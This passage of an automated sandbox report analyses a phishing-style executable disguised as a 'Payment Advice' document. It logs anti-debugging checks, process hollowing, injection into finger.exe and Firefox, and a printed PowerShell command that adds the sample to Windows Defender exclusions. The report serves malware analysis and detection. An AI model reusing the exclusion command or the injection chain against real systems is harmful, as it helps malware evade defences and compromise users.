                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA6F mov eax, dword ptr fs:[00000030h]4_2_016DCA6F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA6F mov eax, dword ptr fs:[00000030h]4_2_016DCA6F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171CA72 mov eax, dword ptr fs:[00000030h]4_2_0171CA72
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171CA72 mov eax, dword ptr fs:[00000030h]4_2_0171CA72
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174EA60 mov eax, dword ptr fs:[00000030h]4_2_0174EA60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0A5B mov eax, dword ptr fs:[00000030h]4_2_016B0A5B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B0A5B mov eax, dword ptr fs:[00000030h]4_2_016B0A5B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6A50 mov eax, dword ptr fs:[00000030h]4_2_016A6A50
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CEA2E mov eax, dword ptr fs:[00000030h]4_2_016CEA2E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DCA24 mov eax, dword ptr fs:[00000030h]4_2_016DCA24
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C4A35 mov eax, dword ptr fs:[00000030h]4_2_016C4A35
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C4A35 mov eax, dword ptr fs:[00000030h]4_2_016C4A35
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172CA11 mov eax, dword ptr fs:[00000030h]4_2_0172CA11
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DAAEE mov eax, dword ptr fs:[00000030h]4_2_016DAAEE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DAAEE mov eax, dword ptr fs:[00000030h]4_2_016DAAEE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6ACC mov eax, dword ptr fs:[00000030h]4_2_016F6ACC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6ACC mov eax, dword ptr fs:[00000030h]4_2_016F6ACC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6ACC mov eax, dword ptr fs:[00000030h]4_2_016F6ACC
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A0AD0 mov eax, dword ptr fs:[00000030h]4_2_016A0AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D4AD0 mov eax, dword ptr fs:[00000030h]4_2_016D4AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D4AD0 mov eax, dword ptr fs:[00000030h]4_2_016D4AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A8AA0 mov eax, dword ptr fs:[00000030h]4_2_016A8AA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A8AA0 mov eax, dword ptr fs:[00000030h]4_2_016A8AA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016F6AA4 mov eax, dword ptr fs:[00000030h]4_2_016F6AA4
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AEA80 mov eax, dword ptr fs:[00000030h]4_2_016AEA80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AEA80 mov eax, dword ptr fs:[00000030h]4_2_016AEA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                    NtWriteVirtualMemory: Direct from: 0x76F0490C
                    NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                    NtClose: Direct from: 0x76F02B6C
                    NtReadVirtualMemory: Direct from: 0x76F02E8C
                    NtCreateKey: Direct from: 0x76F02C6C
                    NtSetInformationThread: Direct from: 0x76F02B4C
                    NtQueryAttributesFile: Direct from: 0x76F02E6C
                    NtAllocateVirtualMemory: Direct from: 0x76F048EC
                    NtQuerySystemInformation: Direct from: 0x76F048CC
                    NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                    NtOpenSection: Direct from: 0x76F02E0C
                    NtSetInformationThread: Direct from: 0x76EF63F9
                    NtDeviceIoControlFile: Direct from: 0x76F02AEC
                    NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                    NtCreateFile: Direct from: 0x76F02FEC
                    NtOpenFile: Direct from: 0x76F02DCC
                    NtQueryInformationToken: Direct from: 0x76F02CAC
                    NtTerminateThread: Direct from: 0x76F02FCC
                    NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                    NtOpenKeyEx: Direct from: 0x76F02B9C
                    NtProtectVirtualMemory: Direct from: 0x76F02F9C
                    NtSetInformationProcess: Direct from: 0x76F02C5C
                    NtNotifyChangeKey: Direct from: 0x76F03C2C
                    NtCreateMutant: Direct from: 0x76F035CC
                    NtWriteVirtualMemory: Direct from: 0x76F02E3C
                    NtMapViewOfSection: Direct from: 0x76F02D1C
                    NtResumeThread: Direct from: 0x76F036AC
                    NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                    NtReadFile: Direct from: 0x76F02ADC
                    NtQuerySystemInformation: Direct from: 0x76F02DFC
                    NtDelayExecution: Direct from: 0x76F02DDC
                    NtQueryInformationProcess: Direct from: 0x76F02C26
                    NtResumeThread: Direct from: 0x76F02FBC
                    NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | Memory written: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | Section loaded: NULL target: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe | Thread register set: target process: 7932
                Source: C:\Windows\SysWOW64\finger.exe | Thread APC queued: target process: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | Process created: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3552555312.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000000.2137539187.0000000001481000.00000002.00000001.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552755765.0000000001B11000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                    Queries volume information: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
